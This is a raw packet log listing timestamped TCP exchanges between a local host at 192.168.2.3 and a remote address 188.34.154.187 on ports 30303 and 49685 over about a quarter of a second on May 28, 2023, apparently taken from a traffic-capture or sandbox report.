May 28, 2023 10:46:23.333287001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333304882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333312035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333334923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333338976 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333358049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333364964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333389997 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333400011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333417892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333425999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333447933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333455086 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333473921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333481073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333503008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333547115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333642960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333667994 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333693027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333693981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333713055 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333718061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333738089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333744049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333765030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333770037 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333794117 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333795071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333816051 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333822966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333843946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333848953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333873034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333875895 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333894968 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333903074 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333925009 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333930969 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333949089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333956003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.333976984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.333982944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334006071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334011078 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334033012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334036112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334063053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334064007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334089041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334090948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334112883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334117889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334136963 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334145069 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334167004 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334171057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334192038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334197998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334218979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334224939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334244967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334271908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334306955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334332943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334353924 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334357977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334378958 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334383965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334403038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334410906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334436893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334446907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334464073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334472895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334484100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334491968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334512949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334517002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334537983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334543943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334562063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334568977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334589958 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334594965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334619999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334621906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334646940 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334649086 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334666967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334673882 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334693909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334721088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334878922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334903955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334928989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334932089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334945917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334954977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334970951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.334981918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.334995031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335009098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335022926 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335035086 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335052013 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335061073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335077047 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335087061 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335103989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335113049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335129976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335138083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335165024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335172892 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335194111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335192919 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335212946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335216999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335235119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335237980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335257053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335259914 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335278034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335300922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335302114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335324049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335344076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335345030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335362911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335366964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335381985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335387945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335407019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335408926 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335427999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335431099 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335452080 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335454941 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335477114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335479975 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335496902 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335499048 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335515976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335520983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335537910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335542917 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335562944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335562944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335580111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335583925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335603952 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335608006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335623980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335629940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335648060 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335652113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335670948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335674047 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335695982 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335696936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335716963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335722923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335737944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335742950 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335757971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335766077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335779905 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335784912 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335799932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335802078 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335820913 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335824013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335841894 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335846901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335865974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335867882 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335886955 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335891008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335911989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335920095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335932970 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335952044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335956097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335956097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335973024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335973024 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.335990906 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.335994959 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.336014032 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.336015940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.336046934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339227915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339247942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339267015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339267969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339289904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339289904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339301109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339312077 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339320898 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339333057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339338064 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339353085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339356899 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339374065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339378119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339395046 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339396000 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339413881 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339416027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339438915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339438915 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339457035 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339462042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339481115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339483976 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339498997 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339504957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339524984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339525938 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.339545012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.339567900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.344955921 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.345002890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.345020056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.345050097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.351903915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.351926088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.351944923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.351965904 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.351986885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.351994991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352006912 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352025986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352025986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352029085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352051020 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352055073 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352072954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352080107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352093935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352108002 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352114916 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352125883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352144957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352148056 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352164030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352179050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352191925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352199078 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352220058 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352225065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352238894 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352241993 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352274895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352297068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352350950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352370977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352391005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352397919 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352412939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352415085 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352432966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352433920 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352454901 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352457047 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352473021 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352478981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352499962 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352504015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352519989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352540016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352544069 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352586985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352588892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352618933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352637053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352638960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352659941 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352668047 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352684975 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352701902 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352705956 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352745056 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352751017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352765083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352785110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352791071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352801085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.352808952 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352829933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.352850914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.357214928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357239008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357258081 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357279062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357299089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357319117 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357319117 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.357341051 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357342005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.357362986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357378006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.357378006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.357383966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357405901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.357414007 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.357448101 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358144045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358165026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358192921 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358202934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358231068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358253002 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358288050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358306885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358325958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358338118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358345985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358361006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358382940 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358403921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358524084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358573914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358618975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358639002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358668089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358688116 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.358742952 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.358791113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359446049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359466076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359512091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359532118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359550953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359568119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359580994 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359587908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359611988 CEST	49685	30303	192.168.2.3	188.34.154.187
